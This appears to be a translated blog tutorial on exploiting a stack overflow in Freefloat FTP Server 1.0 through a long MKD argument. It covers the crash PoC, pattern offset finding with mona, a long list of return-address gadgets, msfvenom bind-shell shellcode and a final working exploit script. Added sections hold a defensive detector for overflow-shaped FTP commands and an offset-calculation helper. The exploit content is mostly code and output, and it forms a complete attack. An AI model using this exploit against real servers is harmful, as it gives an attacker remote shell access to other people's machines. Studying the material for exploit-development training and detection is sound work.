Freefloat FTP Server 1.0 Vulnerability Analysis

Overflow process

Freefloat FTP Server 1.0 download link

Run the overflow code

    #!/usr/bin/env python3
    # Crash PoC (Python 3: the payload and every command are bytes; the original
    # was Python 2 str). A 1000-byte MKD argument overflows the server's stack
    # buffer, and the debugger shows ESP and EIP filled with 0x41 ('A').
    import socket

    evil = b"A" * 1000

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 21))
    s.recv(1024)                        # 220 banner
    s.send(b'USER anonymous\r\n')
    s.recv(1024)
    s.send(b'PASS anonymous\r\n')
    s.recv(1024)
    s.send(b'MKD ' + evil + b'\r\n')    # the overflowing command
    try:
        s.recv(1024)                    # the server normally dies here
        s.send(b'QUIT\r\n')
    except OSError:
        pass
    s.close()
    


In the debugger, both ESP and EIP are filled with the 'A' character (0x41).
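The trigger is nothing more than an FTP command whose argument is far longer than any real directory name. As an added defensive example (not part of the original post), the Python below scans captured control-channel lines and flags the shapes this post sends: oversized arguments, non-printable bytes (where a return address and shellcode would sit) and runs of 0x90. The sample lines, the 255-byte threshold (the Windows path-component limit) and the helper names are constructed assumptions.

```python
#!/usr/bin/env python3
"""Flag FTP control-channel commands shaped like the MKD overflow in this post."""
from typing import List, Tuple

# Assumption: a legitimate directory name is a single path component, and
# Windows limits those to 255 characters. Longer arguments, arguments carrying
# bytes outside printable ASCII, or 0x90 runs (a NOP sled) are flagged.
MAX_ARG_LEN = 255
NOP_RUN = b"\x90" * 8

# Constructed sample capture (not from the original post): a normal session,
# then the two request shapes the post sends. The last one keeps the post's
# layout (247 filler bytes, a 4-byte address, a NOP sled, padding to 1000).
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"MKD uploads\r\n",
    b"MKD " + b"A" * 1000 + b"\r\n",
    b"MKD " + b"A" * 247 + b"\xb0\x9d\x93\x7c" + b"\x90" * 20 + b"C" * 729 + b"\r\n",
    b"QUIT\r\n",
]


def parse_command(line: bytes) -> Tuple[str, bytes]:
    """Split one command line into (VERB, raw argument bytes)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.decode("ascii", "replace").upper(), arg


def inspect_command(line: bytes, max_arg_len: int = MAX_ARG_LEN) -> List[str]:
    """Return the reasons a command looks like an overflow attempt ([] if none)."""
    verb, arg = parse_command(line)
    reasons = []
    if len(arg) > max_arg_len:
        reasons.append(f"{verb}: argument is {len(arg)} bytes, limit {max_arg_len}")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append(f"{verb}: argument contains non-printable bytes")
    if NOP_RUN in arg:
        reasons.append(f"{verb}: argument contains a run of 0x90 bytes")
    return reasons


def scan(commands: List[bytes]) -> List[Tuple[int, List[str]]]:
    """Inspect every line; return (line index, reasons) for the flagged ones."""
    findings = []
    for index, line in enumerate(commands):
        reasons = inspect_command(line)
        if reasons:
            findings.append((index, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_COMMANDS):
        print(f"line {index}:")
        for reason in reasons:
            print("  " + reason)
```

The verb is not special-cased, so the same check covers any command whose argument is copied into a fixed buffer; in practice the input would come from the server's command log or from a packet capture of port 21 rather than the embedded sample.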


Next we use the pattern_create tool to generate a 1000-character pattern to replace the 'A's above:

    msfconsole
    msf>/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000
    


Using mona (findmsp), the offset to EIP is found to be 247.

Try A*247 + B*4 + C*749 (1000 bytes in total).


0x42 is 'B', so EIP is now under our control; replacing the four B's with the address of an instruction we want executed gives arbitrary code execution.


Searching with mona turns up several addresses (they are also written to jmp.txt); pick one push esp address, 0x77c21025:

    0x7d5a313b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a314f : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a3163 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a318b : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a319f : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a31b3 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a31c7 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a31db : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a31ef : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a3203 : jmp esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d5a3217 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d70fa1e : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d718eed : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x77e6560a : jmp esp |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
    0x77e7025b : jmp esp |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
    0x771a36f8 : jmp esp |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
    0x746b1873 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
    0x77f11d2f : jmp esp |  {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\GDI32.dll)
    0x77dbf049 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77dc965b : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77de8063 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77df3b63 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77e12a9f : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x7c8369f0 : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
    0x7c868667 : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
    0x7c934663 : call esp |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
    0x7c97311b : call esp |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
    0x769b6cca : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x769f9622 : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x76a1e37b : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x76a3120b : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x77d537f8 : call esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
    0x7d5a30e3 : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d637ed3 : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d67f81b : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d6a0672 : call esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x7d71183c : call esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x746bd20f : call esp |  {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
    0x719e8d3f : call esp |  {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
    0x77dbeffc : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77dbf0b2 : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77de8153 : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x77dec23b : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x71a2f8fb : call esp |  {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)
    0x77c21025 : push esp # ret  |  {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5512 (C:\WINDOWS\system32\msvcrt.dll)
    0x7c939db0 : push esp # ret  |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
    0x769a1594 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x769a3624 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x769e0b4e : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x76a8dd4e : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x76ab3995 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
    0x77f4c62b : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x77f4c77f : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x77f54ba3 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x77f61d86 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x77f61e8c : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x77f8d3a8 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
    0x5add6aeb : push esp # ret  |  {PAGE_EXECUTE_READ} [uxtheme.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\uxtheme.dll)
    0x7d5b56ad : push esp # ret  |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
    0x77e96955 : push esp # ret  |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
    0x77183be9 : push esp # ret  |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
    0x771ac390 : push esp # ret  |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
    0x7364e436 : push esp # ret  |  {PAGE_EXECUTE_READ} [msctfime.ime] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\msctfime.ime)
    0x719d51a5 : push esp # ret  |  {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
    0x77da1758 : push esp # ret  |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
    0x71a22b53 : push esp # ret  |  {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)
    

Because the CPU is little-endian, the B*4 is replaced with \x25\x10\xc2\x77 (0x77c21025 with its bytes reversed).
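The pattern_create / pattern_offset steps above and the little-endian packing of the chosen address, as an added Python example (not code from the original post or from Metasploit): it rebuilds Metasploit's "Aa0Aa1..." cyclic pattern, looks up the offset of an EIP value the way pattern_offset.rb does, and packs a 32-bit address with struct so the byte order is never reversed by hand. The function names are this example's own; the EIP value 0x69413269 in the demo is not shown on the page but is computed from the pattern here, being what a 1000-byte pattern leaves in EIP when the offset is 247.

```python
#!/usr/bin/env python3
"""Cyclic pattern generation, EIP offset lookup and little-endian address packing."""
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length: int) -> bytes:
    """Build the non-repeating pattern 'Aa0Aa1Aa2...' of exactly `length` bytes.
    Each 4-byte window is unique within the first 20280 bytes, which is what lets
    a single overwritten EIP value identify its offset in the buffer."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("a pattern longer than 20280 bytes would repeat")
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pack_address(addr: int) -> bytes:
    """Pack a 32-bit value little-endian, i.e. in the byte order x86 stores it."""
    return struct.pack("<I", addr)


def pattern_offset(pattern: bytes, eip) -> int:
    """Offset of the EIP value inside the pattern, or -1 if it is not there.
    `eip` is either the 4 bytes as they sit in memory or the integer read from the
    register pane; an integer is packed little-endian before searching, because the
    register shows the four stack bytes already byte-swapped."""
    needle = pack_address(eip) if isinstance(eip, int) else bytes(eip)
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat[:24].decode())
    # EIP value computed from this pattern at offset 247 (constructed, not on the page)
    print(pattern_offset(pat, 0x69413269))
    print(pack_address(0x77c21025).hex())   # msvcrt push esp # ret from the mona list
    print(pack_address(0x7c939db0).hex())   # ntdll push esp # ret, used in the final PoC
```

The same pack_address call replaces the hand-written "\x25\x10\xc2\x77" and "\xb0\x9d\x93\x7c" strings: the debugger shows 0x69413269 in EIP, pattern_offset turns it back into the 247 from the page, and struct.pack("<I", ...) produces the byte order the buffer needs.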


Generate the shellcode

    root@ubuntu:/home/vincebye# msfvenom -p windows/shell_bind_tcp LPORT=5555 -f c -b '\x00\x0a\x0d'
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    Found 11 compatible encoders
    Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    x86/shikata_ga_nai chosen with final size 355
    Payload size: 355 bytes
    Final size of c file: 1516 bytes
    unsigned char buf[] = 
    "\xda\xd3\xb8\x30\xae\xb1\x19\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    "\x53\x83\xee\xfc\x31\x46\x13\x03\x76\xbd\x53\xec\x8a\x29\x11"
    "\x0f\x72\xaa\x76\x99\x97\x9b\xb6\xfd\xdc\x8c\x06\x75\xb0\x20"
    "\xec\xdb\x20\xb2\x80\xf3\x47\x73\x2e\x22\x66\x84\x03\x16\xe9"
    "\x06\x5e\x4b\xc9\x37\x91\x9e\x08\x7f\xcc\x53\x58\x28\x9a\xc6"
    "\x4c\x5d\xd6\xda\xe7\x2d\xf6\x5a\x14\xe5\xf9\x4b\x8b\x7d\xa0"
    "\x4b\x2a\x51\xd8\xc5\x34\xb6\xe5\x9c\xcf\x0c\x91\x1e\x19\x5d"
    "\x5a\x8c\x64\x51\xa9\xcc\xa1\x56\x52\xbb\xdb\xa4\xef\xbc\x18"
    "\xd6\x2b\x48\xba\x70\xbf\xea\x66\x80\x6c\x6c\xed\x8e\xd9\xfa"
    "\xa9\x92\xdc\x2f\xc2\xaf\x55\xce\x04\x26\x2d\xf5\x80\x62\xf5"
    "\x94\x91\xce\x58\xa8\xc1\xb0\x05\x0c\x8a\x5d\x51\x3d\xd1\x09"
    "\x96\x0c\xe9\xc9\xb0\x07\x9a\xfb\x1f\xbc\x34\xb0\xe8\x1a\xc3"
    "\xb7\xc2\xdb\x5b\x46\xed\x1b\x72\x8d\xb9\x4b\xec\x24\xc2\x07"
    "\xec\xc9\x17\xbd\xe4\x6c\xc8\xa0\x09\xce\xb8\x64\xa1\xa7\xd2"
    "\x6a\x9e\xd8\xdc\xa0\xb7\x71\x21\x4b\xa2\x32\xac\xad\xa6\x24"
    "\xf9\x66\x5e\x87\xde\xbe\xf9\xf8\x34\x97\x6d\xb0\x5e\x20\x92"
    "\x41\x75\x06\x04\xca\x9a\x92\x35\xcd\xb6\xb2\x22\x5a\x4c\x53"
    "\x01\xfa\x51\x7e\xf1\x9f\xc0\xe5\x01\xe9\xf8\xb1\x56\xbe\xcf"
    "\xcb\x32\x52\x69\x62\x20\xaf\xef\x4d\xe0\x74\xcc\x50\xe9\xf9"
    "\x68\x77\xf9\xc7\x71\x33\xad\x97\x27\xed\x1b\x5e\x9e\x5f\xf5"
    "\x08\x4d\x36\x91\xcd\xbd\x89\xe7\xd1\xeb\x7f\x07\x63\x42\xc6"
    "\x38\x4c\x02\xce\x41\xb0\xb2\x31\x98\x70\xc2\x7b\x80\xd1\x4b"
    "\x22\x51\x60\x16\xd5\x8c\xa7\x2f\x56\x24\x58\xd4\x46\x4d\x5d"
    "\x90\xc0\xbe\x2f\x89\xa4\xc0\x9c\xaa\xec";
    

Final version of the PoC

    #!/usr/bin/env python3
    # Final PoC (Python 3: every payload piece is bytes; the original was Python 2 str).
    import socket

    # msfvenom windows/shell_bind_tcp LPORT=5555, bad chars \x00\x0a\x0d, 355 bytes
    shellcode = (
        b"\xda\xd3\xb8\x30\xae\xb1\x19\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
        b"\x53\x83\xee\xfc\x31\x46\x13\x03\x76\xbd\x53\xec\x8a\x29\x11"
        b"\x0f\x72\xaa\x76\x99\x97\x9b\xb6\xfd\xdc\x8c\x06\x75\xb0\x20"
        b"\xec\xdb\x20\xb2\x80\xf3\x47\x73\x2e\x22\x66\x84\x03\x16\xe9"
        b"\x06\x5e\x4b\xc9\x37\x91\x9e\x08\x7f\xcc\x53\x58\x28\x9a\xc6"
        b"\x4c\x5d\xd6\xda\xe7\x2d\xf6\x5a\x14\xe5\xf9\x4b\x8b\x7d\xa0"
        b"\x4b\x2a\x51\xd8\xc5\x34\xb6\xe5\x9c\xcf\x0c\x91\x1e\x19\x5d"
        b"\x5a\x8c\x64\x51\xa9\xcc\xa1\x56\x52\xbb\xdb\xa4\xef\xbc\x18"
        b"\xd6\x2b\x48\xba\x70\xbf\xea\x66\x80\x6c\x6c\xed\x8e\xd9\xfa"
        b"\xa9\x92\xdc\x2f\xc2\xaf\x55\xce\x04\x26\x2d\xf5\x80\x62\xf5"
        b"\x94\x91\xce\x58\xa8\xc1\xb0\x05\x0c\x8a\x5d\x51\x3d\xd1\x09"
        b"\x96\x0c\xe9\xc9\xb0\x07\x9a\xfb\x1f\xbc\x34\xb0\xe8\x1a\xc3"
        b"\xb7\xc2\xdb\x5b\x46\xed\x1b\x72\x8d\xb9\x4b\xec\x24\xc2\x07"
        b"\xec\xc9\x17\xbd\xe4\x6c\xc8\xa0\x09\xce\xb8\x64\xa1\xa7\xd2"
        b"\x6a\x9e\xd8\xdc\xa0\xb7\x71\x21\x4b\xa2\x32\xac\xad\xa6\x24"
        b"\xf9\x66\x5e\x87\xde\xbe\xf9\xf8\x34\x97\x6d\xb0\x5e\x20\x92"
        b"\x41\x75\x06\x04\xca\x9a\x92\x35\xcd\xb6\xb2\x22\x5a\x4c\x53"
        b"\x01\xfa\x51\x7e\xf1\x9f\xc0\xe5\x01\xe9\xf8\xb1\x56\xbe\xcf"
        b"\xcb\x32\x52\x69\x62\x20\xaf\xef\x4d\xe0\x74\xcc\x50\xe9\xf9"
        b"\x68\x77\xf9\xc7\x71\x33\xad\x97\x27\xed\x1b\x5e\x9e\x5f\xf5"
        b"\x08\x4d\x36\x91\xcd\xbd\x89\xe7\xd1\xeb\x7f\x07\x63\x42\xc6"
        b"\x38\x4c\x02\xce\x41\xb0\xb2\x31\x98\x70\xc2\x7b\x80\xd1\x4b"
        b"\x22\x51\x60\x16\xd5\x8c\xa7\x2f\x56\x24\x58\xd4\x46\x4d\x5d"
        b"\x90\xc0\xbe\x2f\x89\xa4\xc0\x9c\xaa\xec"
    )
    buffer = b"\x90" * 20 + shellcode          # NOP sled + shellcode (375 bytes)

    # push esp # ret candidates from the mona output above:
    #   0x77c21025  msvcrt.dll
    #   0x7c939db0  ntdll.dll  <- used below, written little-endian
    # Layout: 247 bytes of padding, the 4-byte address, the sled + shellcode,
    # then 'C' padding so the whole argument stays 1000 bytes.
    evil = b"A" * 247 + b"\xb0\x9d\x93\x7c" + buffer + b"C" * (749 - len(buffer))

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 21))
    s.recv(1024)                        # 220 banner
    s.send(b'USER anonymous\r\n')
    s.recv(1024)
    s.send(b'PASS anonymous\r\n')
    s.recv(1024)
    s.send(b'MKD ' + evil + b'\r\n')    # the overflowing command
    try:
        s.recv(1024)
        s.send(b'QUIT\r\n')
    except OSError:
        pass
    s.close()
    
    



Notes

1. Start the FTP server -> Immunity Debugger (imdbg) / attach -> run poc.py -> F9 (run). Sometimes the Registers (FPU) pane shows no data; close the program and reopen it.
2. The CPU is little-endian.
3. The Python version of the shellcode opened the port, but the shell could not be connected to.
4. When the program crashes during debugging, do not click the "Don't Send" or similar buttons, which close it.


Mona

Manual

https://bbs.pediy.com/thread-198185.htm

!mona

findmsp / findmsf | search memory for a cyclic (Metasploit) pattern

jmp / j | Find pointers that will allow you to jump to a register

Used with Immunity Debugger

Put mona.py into the PyCommands folder.

Original article: https://www.cnblogs.com/vincebye/p/12820754.html